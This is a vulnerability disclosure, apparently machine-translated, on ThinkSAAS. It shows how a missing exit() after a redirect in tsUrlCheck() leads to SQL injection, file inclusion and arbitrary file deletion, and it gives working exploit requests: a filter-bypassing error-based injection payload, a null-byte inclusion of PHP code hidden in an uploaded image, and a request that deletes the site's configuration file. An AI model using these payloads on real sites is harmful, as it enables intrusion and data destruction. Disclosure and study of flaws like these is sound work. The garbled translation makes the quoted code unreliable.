Pack the latest version of ThinkSAAS Vulnerability

Pack the latest version of ThinkSAAS Vulnerability

SQL Injection + File Inclusion +...
Learn from xfkxfk, pack multiple vulnerabilities, and want to go through a major vendor process.

In the latest version, the tsUrlCheck () function has multiple vulnerabilities.

\ Thinksaas \ tsFunction. php

Function tsUrlCheck ($ parameter) {$ parameter = trim ($ parameter); // echo $ parameter; exit (); $ arrStr = str_split ($ parameter ); $ strOk = '%-_ 1234567890abcdefghijklmnopqrstuvwxyz'; foreach ($ arrStr as $ key => $ item) {if (stripos ($ strOk, $ item) = false) {// qiMsg ('invalid URL parameter! '); Header ('location:/') ;}return $ parameter ;}

When you check whether the input parameter contains any character other than the $ strOk variable, you must use the header to jump.

However, exit () is not used to exit, so the program continues to run.

So there is a problem!

1. SQL injection:

\ App \ tag \ action \ add. php

case "do":$objname = tsFilter($_POST['objname']);$idname = tsFilter($_POST['idname']);$objid = intval($_POST['objid']);$tags = t($_POST['tags']);$new['tag']->addTag($objname,$idname,$objid,$tags);

$ Objname and $ idname are controllable, while the tsFilter () function only performs simple filtering and can be bypassed. For details, refer to: WooYun: ThinkSAAS latest version to bypass filtering and continue injection.

The next two controllable variables enter addTag ()

\ App \ tag \ class. tag. php

function addTag($objname,$idname,$objid,$tags){$objname = tsUrlCheck($objname);$idname = tsUrlCheck($idname);$objid = intval($objid);if($objname != '' && $idname != '' && $objid!=0 && $tags!=''){$tags = str_replace ( '，', ',', $tags );$arrTag = explode(',',$tags);foreach($arrTag as $item){$tagname = t($item);if(strlen($tagname) < '32' && $tagname != ''){$uptime = time();$tagcount = $this->findCount('tag',array('tagname'=>$tagname,));if($tagcount == '0'){$tagid = $this->create('tag',array('tagname'=>$tagname,'uptime'=>$uptime,));$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array($idname=>$objid,'tagid'=>$tagid,));

$ Objname and $ idname enter $ this-> findCount ()

$ Objname: At the table name and $ idname as $ key, input findCount ()

Follow up with findCount () to find that $ key is not filtered and not enclosed in quotation marks, so it is not subject to GPC restrictions.

Because headers are redirected here, And thinksaas does not return an error, other methods are required to obtain the injection information.

Reference: WooYun: Thinksaas latest injection ignoring GPC

We can know that all mysql error messages of thinksaas will be recorded in a log file, so the error injection can be successful.



2. SQL injection:

\ App \ tag \ action \ add_ajax.php

case "do":$objname = tsUrlCheck($_POST['objname']);$idname = tsUrlCheck($_POST['idname']);$objid = intval($_POST['objid']);$tags = t($_POST['tags']);$new['tag']->addTag($objname,$idname,$objid,$tags);

Here, tsUrlCheck () is directly used to check the POST data, and tsFilter () is not used. The subsequent analysis is the same as that of 1.

3. Any file contains:

\ Thinksaas. php

$app = isset($_GET['app']) ? tsUrlCheck($_GET['app']) : 'home';...include 'app/' . $app . '/config.php';

The GET parameter is included only for the causal tsUrlCheck check.

Therefore, arbitrary files can be directly included by truncation.

4. delete any file:

/App/system/action/plugin. php

case "delete":$apps = tsUrlCheck($_GET['apps']);$pname = tsUrlCheck($_GET['pname']);delDir('plugins/'.$apps.'/'.$pname);

Similarly, $ apps and $ pname are detected only by tsUrlCheck and enter the dangerous function. Both variables are controllable and do not need to be truncated. You can simply delete them if you want to delete them.

However, this operation can only be performed by administrators, so it must be used with CSRF.

1. injection:

The following describes the complex first SQL Injection demonstration and exp:

Exp: http: // 192.168.226.131/thinksaas/index. php? App = tag & ac = add & ts = do

objname=article&idname=1=1 anand d (selselect ect 1 frfrom om(selselect ect cocount unt(*),concat((selselect ect (selselect ect (selselect ect user())) frfrom om information_schema.tables limit 0,1),floor(rand(0)*2))x frfrom om information_schema.tables group bby y x)a)/*&objid=3&tags=5

 

2. File Inclusion:

First, upload an image with php code inserted in the upload avatar.
 

 

Next, access and perform the following operations:

Http: // 192.168.226.131/thinksaas/index. php? App = ../cache/user/0/0/120/2 .jpg% 00a

Generate a 1.php file in the root directory.
 

3. delete any file:

Access as an administrator:

Http: // 192.168.226.131/thinksaas/index. php? App = system & ac = plugin & ts = delete & apps =... & pname = data/config. inc. php

Because thinksaas judges whether config. inc. php exists to determine whether it has been installed. Therefore, after deleting the file, you can reinstall it.

Solution:

Remember to exit after the header